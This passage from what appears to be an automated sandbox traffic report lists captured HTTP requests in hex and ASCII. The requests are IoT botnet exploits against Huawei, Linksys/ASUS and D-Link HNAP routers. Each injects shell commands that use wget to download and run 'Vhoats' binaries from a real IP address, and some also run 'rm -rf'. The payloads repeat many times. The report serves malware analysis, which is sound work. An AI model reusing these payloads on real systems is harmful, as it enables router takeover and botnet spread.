4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
